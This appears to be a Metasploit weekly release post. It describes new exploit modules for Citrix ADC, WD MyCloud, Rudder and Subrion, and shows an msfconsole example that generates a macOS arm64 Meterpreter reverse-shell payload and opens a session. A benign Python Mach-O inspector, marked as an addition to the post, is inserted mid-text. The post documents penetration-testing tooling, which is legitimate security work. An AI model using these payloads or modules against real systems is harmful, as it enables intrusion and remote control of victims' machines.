Last updated at Tue, 23 Jan 2024 21:46:08 GMT

Fly High in the Sky With This New Cloud Exploit!

This week, a new module was added that takes advantage of both authentication bypass and command injection in certain versions of Western Digital's MyCloud hardware. Submitted by community member Erik Wynter, this module gains access to the target, attempts to bypass authentication, verifies whether that was successful, then executes the payload with root privileges. This works on versions before 2.30.196, and offers a lot of flexibility in just a few commands. See the original PR for more info!

OSX Meterpreter support for M1 and M2 devices

Thanks to the great work of usiegl00, Metasploit now has payload support for both M1 and M2 Arm64 devices that run without the x64 Rosetta emulator being installed on the target machine.

The new payloads are:

  • osx/aarch64/meterpreter/reverse_tcp
  • osx/aarch64/meterpreter_reverse_https
  • osx/aarch64/meterpreter_reverse_tcp
  • osx/aarch64/meterpreter_reverse_http

Example of generating a payload:

msf6 > use payload/osx/aarch64/meterpreter_reverse_tcp
msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > generate -f macho -o /Users/user/Desktop/payload_stageless LHOST=127.0.0.1
[*] Writing 812819 bytes to /Users/user/Desktop/payload_stageless...

After executing the payload on the remote host, the session will open and can be interacted with:

msf6 payload(osx/aarch64/meterpreter_reverse_tcp) >
[*] Transmitting first stager...(328 bytes)
[*] Transmitting second stager...(65536 bytes)
[*] Sending stage (812819 bytes) to 127.0.0.1
[*] Meterpreter session 8 opened (127.0.0.1:4444 -> 127.0.0.1:49167) at 2023-07-31 16:19:23 -0500

msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 5...

meterpreter > getuid
Server username: demo
meterpreter > sysinfo
Computer     : demo.local
OS           : macOS Ventura (macOS 13.2.0)
Architecture : arm64
BuildTuple   : aarch64-apple-darwin
Meterpreter  : aarch64/osx
meterpreter >
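The `generate -f macho` step above emits a Mach-O file, and the point of the new payloads is that they run as native arm64 code with no Rosetta translation. As an added example (not code from the original post or from Metasploit), the following Python inspector parses a Mach-O header, handles universal ("fat") binaries, and reports whether a file carries an arm64 slice; the sample headers at the bottom are constructed inline, so it runs offline against them or against any real binary you pass to `macho_arches`.

```python
import struct

# Mach-O constants from <mach-o/loader.h>, <mach-o/fat.h> and <mach/machine.h>.
MH_MAGIC_64 = 0xFEEDFACF          # 64-bit little-endian thin Mach-O
MH_MAGIC = 0xFEEDFACE             # 32-bit little-endian thin Mach-O
FAT_MAGIC = 0xCAFEBABE            # universal binary header (big-endian fields)
CPU_ARCH_ABI64 = 0x01000000
CPU_TYPES = {7: "x86", 7 | CPU_ARCH_ABI64: "x86_64",
             12: "arm", 12 | CPU_ARCH_ABI64: "arm64"}
FILETYPES = {1: "MH_OBJECT", 2: "MH_EXECUTE", 6: "MH_DYLIB", 8: "MH_BUNDLE"}


def parse_thin(data, offset=0):
    """Return (cpu, filetype) for a thin little-endian Mach-O header at offset."""
    if len(data) < offset + 16:
        raise ValueError("truncated Mach-O header at offset %d" % offset)
    magic, cputype, _cpusubtype, filetype = struct.unpack_from("<IIII", data, offset)
    if magic not in (MH_MAGIC_64, MH_MAGIC):
        raise ValueError("no Mach-O magic at offset %d" % offset)
    return (CPU_TYPES.get(cputype, "cpu:0x%x" % cputype),
            FILETYPES.get(filetype, "filetype:%d" % filetype))


def macho_arches(data):
    """List every (cpu, filetype) slice in a thin or fat Mach-O image."""
    if len(data) < 8:
        raise ValueError("file too small to be Mach-O")
    if struct.unpack_from(">I", data, 0)[0] == FAT_MAGIC:
        # fat_header: magic, nfat_arch; then nfat_arch fat_arch records of 5 uint32 (big-endian)
        nfat = struct.unpack_from(">I", data, 4)[0]
        slices = []
        for i in range(nfat):
            _cpu, _sub, off, _size, _align = struct.unpack_from(">IIIII", data, 8 + 20 * i)
            slices.append(parse_thin(data, off))   # trust the slice's own header, not the fat entry
        return slices
    return [parse_thin(data)]


def runs_native_on_apple_silicon(data):
    """True when at least one slice is arm64, i.e. no Rosetta needed."""
    return any(cpu == "arm64" for cpu, _ in macho_arches(data))


# Constructed sample headers (32-byte mach_header_64 with zero load commands), not real payloads.
SAMPLE_ARM64 = struct.pack("<8I", MH_MAGIC_64, 12 | CPU_ARCH_ABI64, 0, 2, 0, 0, 0, 0)
SAMPLE_X86_64 = struct.pack("<8I", MH_MAGIC_64, 7 | CPU_ARCH_ABI64, 3, 2, 0, 0, 0, 0)
SAMPLE_FAT = (struct.pack(">II", FAT_MAGIC, 2)
              + struct.pack(">IIIII", 7 | CPU_ARCH_ABI64, 3, 48, 32, 12)
              + struct.pack(">IIIII", 12 | CPU_ARCH_ABI64, 0, 80, 32, 14)
              + SAMPLE_X86_64 + SAMPLE_ARM64)
```

Pass `open(path, "rb").read()` to `macho_arches` to check a real file; a Java class file also starts with 0xCAFEBABE, so an unexpected `nfat_arch` on such input will surface as a parse error rather than a false arm64 report.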

Metasploit takes to the road

Next week, part of the Metasploit team will be in Las Vegas for Black Hat, BSides Las Vegas and DEF CON. Our own Spencer McIntyre will be demonstrating some of the latest Metasploit features and workflows for targeting Active Directory at both Black Hat and DEF CON. Be sure to stop by and check it out. We’ll also be giving out the local currency of stickers.

  • Black Hat on Thursday, August 10th at 13:00-14:30 in the Business Hall
  • DEF CON on Friday, August 11th at 10:00-12:00 in the Committee Boardroom

New module content (10)

Citrix ADC (NetScaler) Forms SSO Target RCE

Authors: Douglass McKee, Ron Bowes, and Spencer McIntyre
Type: Exploit
Pull request: #18240 contributed by zeroSteiner
Path: exploits/freebsd/http/citrix_formssso_target_rce
AttackerKB reference: CVE-2023-3519

Description: This adds an exploit for CVE-2023-3519 which is an unauthenticated RCE in Citrix ADC. By making a specially crafted HTTP GET request, an attacker can trigger a stack buffer overflow within the nsppe process which runs as root.

Western Digital MyCloud unauthenticated command injection

Authors: Erik Wynter, Remco Vermeulen, and Steven Campbell
Type: Exploit
Pull request: #18221 contributed by ErikWynter
Path: exploits/linux/http/wd_mycloud_unauthenticated_cmd_injection
AttackerKB reference: CVE-2018-17153

Description: This adds an exploit module for the authentication bypass (CVE-2018-17153) and command injection (CVE-2016-10108) vulnerabilities in Western Digital MyCloud before 2.30.196. The module first checks whether the target is vulnerable by attempting the authentication bypass and then injecting a simple echo command. If the target is confirmed to be vulnerable, the module uses the same command injection vulnerability to execute the payload with root privileges.

Rudder Server SQLI Remote Code Execution

Author: Ege Balcı
Type: Exploit
Pull request: #18205 contributed by EgeBalci
Path: exploits/multi/http/rudder_server_sqli_rce
AttackerKB reference: CVE-2023-30625

Description: This adds an exploit module that leverages an SQL injection vulnerability (CVE-2023-30625) in RudderStack's rudder-server to achieve unauthenticated remote code execution. The vulnerability affects versions of rudder-server before 1.3.0-rc.1.

Intelliants Subrion CMS 4.2.1 - Authenticated File Upload Bypass to RCE

Authors: Fellipe Oliveira, Hexife, and Ismail E. Dawoodjee
Type: Exploit
Pull request: #18211 contributed by ismaildawoodjee
Path: exploits/multi/http/subrion_cms_file_upload_rce
AttackerKB reference: CVE-2018-19422

Description: This adds an exploit module that leverages an authenticated file upload vulnerability in Subrion CMS versions 4.2.1 and prior. Due to an issue in the way the .htaccess file is configured by default, it is possible to upload PHP code to the web server and achieve remote code execution.

AWS Instance Connection

Author: sempervictus
Type: Payload
Pull request: #17600 contributed by sempervictus
Path: payloads/singles/cmd/unix/bind_aws_instance_connect

Description: This adds AWS instance connection sessions.

OSX AArch64 Payload Support

Author: usiegl00
Type: Payload
Pull request: #17129 contributed by usiegl00
Path: payloads/singles/osx/aarch64/meterpreter_reverse_http

Description: Adds new support for multiple OSX AArch64 payloads: osx/aarch64/meterpreter/reverse_tcp, osx/aarch64/meterpreter_reverse_https, osx/aarch64/meterpreter_reverse_tcp, osx/aarch64/meterpreter_reverse_http. This enables the use of native payloads on M1 or M2 OSX devices that do not have Rosetta installed.

Enhancements and features (4)

  • #18223 from adfoster-r7 - This PR fixes broken msfconsole command history management when switching between shell sessions.
  • #18239 from h00die - Adds verified version numbers (1.12.1, 1.12.1-RC2, and 1.20.0) to the exploits/multi/http/apache_nifi_processor_rce RCE module.
  • #18249 from adfoster-r7 - Provide better error messages when failing to load Mettle extensions, such as the extended API extapi.
  • #18255 from adfoster-r7 - Removes Python2 support from the Metasploit docker container now that it is officially end of life, and no longer used by Metasploit. Python3 support remains available.

Bugs fixed (6)

  • #18203 from adfoster-r7 - Fixes a crash when running the scanner/ssh/libssh_auth_bypass module on newer versions of Ruby.
  • #18209 from adfoster-r7 - This fixes an issue in the windows/local/bypassuac_comhijack exploit module, which was breaking due to a syntax error.
  • #18234 from D00Movenok - This fixes a bug in the 64-bit messagebox payload where it would fail to execute if user32 was not already loaded.
  • #18238 from dwelch-r7 - Fixes an issue when setting USERNAME, USER_FILE and PASS_FILE together on scanner modules: previously the first username in USER_FILE would not be tested against any password in PASS_FILE.
  • #18243 from adfoster-r7 - This PR fixes an issue where an AppScan import would fail due to an empty proof.
  • #18248 from adfoster-r7 - Fix bootup warning when running the JSON msfrpc service.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).